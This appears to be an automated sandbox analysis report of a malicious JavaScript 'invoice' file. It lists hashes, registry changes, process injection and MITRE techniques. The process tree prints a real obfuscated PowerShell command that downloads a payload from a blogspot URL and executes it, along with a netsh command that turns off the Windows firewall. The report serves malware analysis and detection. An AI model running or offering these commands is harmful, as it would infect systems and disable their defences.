Analysis
-
max time kernel
145s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2023 06:49
Static task
static1
Behavioral task
behavioral1
Sample
invoice_2566246817.js
Resource
win7-20231025-en
Behavioral task
behavioral2
Sample
invoice_2566246817.js
Resource
win10v2004-20231127-en
General
-
Target
invoice_2566246817.js
-
Size
106KB
-
MD5
fc6d7a11059fee2eda2bab5e4c82c839
-
SHA1
9907895c521bddd02573ca5e361490f017932dbe
-
SHA256
39afb67d0916e6761f7604cb65ebdb1c115f24e62d9b122c0137b46215a0b00c
-
SHA512
1e820c22e9cbd0f360b7187eb8062089ead22cfd1a62e0e47450523659b841bf37278ddfd530c4792529d88145ceb1ff88389d541fda9e68d9c127ba5579fb39
-
SSDEEP
384:boJdyttnpXrov4gPyjjF/9sui+1VaEEEfEfffEfEffESxyOVYZPjcrdRoDT/8W8z:kS5W
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 8 3852 powershell.exe 18 3852 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deefenasdensossl1 = "schtasks /run /tn Deefenasdensossl1" powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 53 api.ipify.org 52 api.ipify.org -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 3852 set thread context of 3380 3852 powershell.exe RegSvcs.exe PID 3852 set thread context of 3832 3852 powershell.exe RegSvcs.exe PID 3852 set thread context of 4656 3852 powershell.exe Msbuild.exe -
Drops file in Windows directory 1 IoCs
Processes:
dw20.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
dw20.exedw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exeRegSvcs.exepid process 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe 3380 RegSvcs.exe 3380 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedw20.exedw20.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 3852 powershell.exe Token: SeRestorePrivilege 3132 dw20.exe Token: SeBackupPrivilege 3132 dw20.exe Token: SeBackupPrivilege 3132 dw20.exe Token: SeBackupPrivilege 440 dw20.exe Token: SeBackupPrivilege 440 dw20.exe Token: SeIncreaseQuotaPrivilege 3852 powershell.exe Token: SeSecurityPrivilege 3852 powershell.exe Token: SeTakeOwnershipPrivilege 3852 powershell.exe Token: SeLoadDriverPrivilege 3852 powershell.exe Token: SeSystemProfilePrivilege 3852 powershell.exe Token: SeSystemtimePrivilege 3852 powershell.exe Token: SeProfSingleProcessPrivilege 3852 powershell.exe Token: SeIncBasePriorityPrivilege 3852 powershell.exe Token: SeCreatePagefilePrivilege 3852 powershell.exe Token: SeBackupPrivilege 3852 powershell.exe Token: SeRestorePrivilege 3852 powershell.exe Token: SeShutdownPrivilege 3852 powershell.exe Token: SeDebugPrivilege 3852 powershell.exe Token: SeSystemEnvironmentPrivilege 3852 powershell.exe Token: SeRemoteShutdownPrivilege 3852 powershell.exe Token: SeUndockPrivilege 3852 powershell.exe Token: SeManageVolumePrivilege 3852 powershell.exe Token: 33 3852 powershell.exe Token: 34 3852 powershell.exe Token: 35 3852 powershell.exe Token: 36 3852 powershell.exe Token: SeBackupPrivilege 3132 dw20.exe Token: SeBackupPrivilege 3132 dw20.exe Token: SeDebugPrivilege 3380 RegSvcs.exe Token: SeIncreaseQuotaPrivilege 3852 powershell.exe Token: SeSecurityPrivilege 3852 powershell.exe Token: SeTakeOwnershipPrivilege 3852 powershell.exe Token: SeLoadDriverPrivilege 3852 powershell.exe Token: SeSystemProfilePrivilege 3852 powershell.exe Token: SeSystemtimePrivilege 3852 powershell.exe Token: SeProfSingleProcessPrivilege 3852 powershell.exe Token: SeIncBasePriorityPrivilege 3852 powershell.exe Token: SeCreatePagefilePrivilege 3852 powershell.exe Token: SeBackupPrivilege 3852 powershell.exe Token: SeRestorePrivilege 3852 powershell.exe Token: SeShutdownPrivilege 3852 powershell.exe Token: SeDebugPrivilege 3852 powershell.exe Token: SeSystemEnvironmentPrivilege 3852 powershell.exe Token: SeRemoteShutdownPrivilege 3852 powershell.exe Token: SeUndockPrivilege 3852 powershell.exe Token: SeManageVolumePrivilege 3852 powershell.exe Token: 33 3852 powershell.exe Token: 34 3852 powershell.exe Token: 35 3852 powershell.exe Token: 36 3852 powershell.exe Token: SeIncreaseQuotaPrivilege 3852 powershell.exe Token: SeSecurityPrivilege 3852 powershell.exe Token: SeTakeOwnershipPrivilege 3852 powershell.exe Token: SeLoadDriverPrivilege 3852 powershell.exe Token: SeSystemProfilePrivilege 3852 powershell.exe Token: SeSystemtimePrivilege 3852 powershell.exe Token: SeProfSingleProcessPrivilege 3852 powershell.exe Token: SeIncBasePriorityPrivilege 3852 powershell.exe Token: SeCreatePagefilePrivilege 3852 powershell.exe Token: SeBackupPrivilege 3852 powershell.exe Token: SeRestorePrivilege 3852 powershell.exe Token: SeShutdownPrivilege 3852 powershell.exe Token: SeDebugPrivilege 3852 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
wscript.exepowershell.execsc.exeMsbuild.exeRegSvcs.exedescription pid process target process PID 4624 wrote to memory of 3852 4624 wscript.exe powershell.exe PID 4624 wrote to memory of 3852 4624 wscript.exe powershell.exe PID 3852 wrote to memory of 4868 3852 powershell.exe csc.exe PID 3852 wrote to memory of 4868 3852 powershell.exe csc.exe PID 4868 wrote to memory of 4852 4868 csc.exe cvtres.exe PID 4868 wrote to memory of 4852 4868 csc.exe cvtres.exe PID 3852 wrote to memory of 1724 3852 powershell.exe netsh.exe PID 3852 wrote to memory of 1724 3852 powershell.exe netsh.exe PID 3852 wrote to memory of 3380 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3380 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3380 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3380 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3380 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3380 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3380 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3380 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3832 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3832 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3832 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3832 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3832 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3832 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3832 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 3832 3852 powershell.exe RegSvcs.exe PID 3852 wrote to memory of 4656 3852 powershell.exe Msbuild.exe PID 3852 wrote to memory of 4656 3852 powershell.exe Msbuild.exe PID 3852 wrote to memory of 4656 3852 powershell.exe Msbuild.exe PID 3852 wrote to memory of 4656 3852 powershell.exe Msbuild.exe PID 3852 wrote to memory of 4656 3852 powershell.exe Msbuild.exe PID 3852 wrote to memory of 4656 3852 powershell.exe Msbuild.exe PID 3852 wrote to memory of 4656 3852 powershell.exe Msbuild.exe PID 3852 wrote to memory of 4656 3852 powershell.exe Msbuild.exe PID 4656 wrote to memory of 440 4656 Msbuild.exe dw20.exe PID 4656 wrote to memory of 440 4656 Msbuild.exe dw20.exe PID 4656 wrote to memory of 440 4656 Msbuild.exe dw20.exe PID 3832 wrote to memory of 3132 3832 RegSvcs.exe dw20.exe PID 3832 wrote to memory of 3132 3832 RegSvcs.exe dw20.exe PID 3832 wrote to memory of 3132 3832 RegSvcs.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\invoice_2566246817.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm hotelofficeewn.blogspot.com////////////////////////////////////atom.xml) | .('{1}{0}'-f'kasokdaoskdoaksodkasodkaoskdoaksdoaksod','I').replace('kasokdaoskdoaksodkasodkaoskdoaksdoaksod','ex'))2⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\niunxias\niunxias.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4C7.tmp" "c:\Users\Admin\AppData\Local\Temp\niunxias\CSCDB641AFE20A84F9EA853DC636A93F63.TMP"4⤵PID:4852
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:1724 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7924⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3132 -
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:440
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f90449ff46a0a799573e41774f8a20cf
SHA1257c931853443a22ff4b3c678aa3b2bf881f8779
SHA256ad7a9de7259c379b02dbd055e21a44f0cb368b5bb1e963542f0fdf3ddad0c0cf
SHA512776ca5012cdfd2afcdb6c47da92ab79cbe75dce96052e5091e0eab80f93ba4d035310d0c0b9c2be7e54bd68bc9b81a7681b209498465d1f002186dc236dc8710
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5e0ce5b6ec2b89d92dbd182b6583df217
SHA1dec6b47e0e245f180a949a23e76001c9ffab8512
SHA256a443b8438a2916b837d934511f810c302b049f03dd96ffdb6b8d6c8c14b27f9b
SHA51240376910d1774e2422c77932baf98a13275e276b6bb83bf04f6509062e6e9067c4e2c1ff3465ad68e038573860480bc9a2cd3e0475956ee298a1f29b09fef766
-
Filesize
652B
MD5afc35df7b4f0d0d601b8ddf0d35b67cf
SHA11db3d856c04050a5f8a9e8f26cb806bab0b93636
SHA25629d933a433d3772f09629534362813e99c17265441ee71c24fb2494d2dd91abf
SHA512ca48d4cc5f8e6738c026f66d5b6d5ca8d405ccfe3be6b9dac8f8e5263d89f3f3194d8119312ce2548e70a7d793efa70c13dc4a21191b34aafaa0a25e912a38fd
-
Filesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
Filesize
369B
MD59181e389bc27463a5a1ad6c8c9801c13
SHA19aff9713e7332cf5da786284ff34c8d6f27d9c36
SHA2560cbc6f198428a1a86750fec0b006f104c2154746be4f15431133f4ef58488be9
SHA51264b5bbab13ad27f63866653e476774f3c2539a48f848b83ad43bb459c2a3d339def8c520cdd0315121812dae08d4bdf45964d31170101debf5edc9aa6b3557e0